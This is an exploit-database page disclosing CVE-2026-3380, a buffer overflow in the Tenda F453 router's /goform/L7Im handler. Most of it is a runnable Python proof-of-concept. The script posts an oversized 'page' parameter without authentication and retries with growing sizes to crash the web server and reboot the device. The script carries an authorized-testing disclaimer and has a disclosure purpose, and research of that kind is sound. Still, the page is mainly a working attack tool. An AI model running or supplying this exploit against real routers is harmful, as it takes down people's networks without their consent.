Tenda F453 v1.0.0.3 frmL7ImForm Buffer Overflow

2026.03.02
Credit: Mohammed Idrees Banyamer
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2026-3380
CWE: CWE-120 (Classic Buffer Overflow) ,

#!/usr/bin/env python3 # Exploit Title: Tenda F453 frmL7ImForm Buffer Overflow # CVE: CVE-2026-3380 # Date: 2026-03-01 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: # Vendor Homepage: https://www.tenda.com.cn/ # Software Link: # Affected: Tenda F453 v1.0.0.3 # Tested on: Tenda F453 v1.0.0.3 # Category: Remote # Platform: Embedded (Linux-based router) # Exploit Type: Denial of Service / Buffer Overflow # CVSS: 8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H # Description: Stack-based buffer overflow in /goform/L7Im via the 'page' parameter # due to unsafe use of sprintf/strcpy in frmL7ImForm function. # Fixed in: # Usage: # python3 exploit.py <target_ip> [size] # # Examples: # python3 exploit.py 192.168.0.1 # python3 exploit.py 192.168.1.1 2300 # # Options: # -- (no additional options implemented) # # Notes: # • For authorized testing / research purposes only # • Most likely causes httpd crash → device reboot (DoS) # • Unauthenticated in affected firmware version # # How to Use # # Step 1: # Connect to the same network as the target router # # Step 2: # Run the script with the router's LAN IP address # # ──────────────────────────────────────────────── import sys import requests import urllib.parse import time def trigger_overflow(target, size=2048): url = f"http://{target}/goform/L7Im" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Content-Type": "application/x-www-form-urlencoded", "Referer": f"http://{target}/", "Connection": "close", } overflow = "A" * size data = { "page": overflow, "module": "L7Im", "action": "apply", } body = urllib.parse.urlencode(data) print(f"[*] Sending to {url}") print(f" Payload length : {len(overflow)} bytes") try: r = requests.post( url, data=body, headers=headers, timeout=6, allow_redirects=False, verify=False ) print(f"[+] Got response → HTTP {r.status_code}") print(f" Content-Length: {len(r.content)} bytes") except requests.exceptions.Timeout: print("[!] TIMEOUT → very likely crashed / httpd died") except requests.exceptions.ConnectionError as e: print(f"[!] ConnectionError: {e} → device probably rebooted") except Exception as e: print(f"[!] Unexpected error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python3 exploit.py <target_ip> [size]") print("Example: python3 exploit.py 192.168.0.1 2300") sys.exit(1) target_ip = sys.argv[1].strip() payload_size = int(sys.argv[2]) if len(sys.argv) > 2 else 2048 print(f"[+] CVE-2026-3380 Exploit - Tenda F453 /goform/L7Im") print(f" Target: {target_ip}") print(f" Size : {payload_size} bytes\n") for sz in [payload_size, payload_size + 512, payload_size + 1024]: print(f"\n─── Trying size = {sz} ───") trigger_overflow(target_ip, sz) time.sleep(2)

References:

https://nvd.nist.gov/vuln/detail/CVE-2026-3380
https://vuldb.com/?id.348265
https://github.com/Litengzheng/vul_db/blob/main/F453/vul_81/README.md
https://www.tenda.com.cn/
(vendor site) Exploit PoC script (attached or linked in your submission): Python code sending oversized 'page' to /goform/L7Im


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2026, cxsecurity.com

 

Back to Top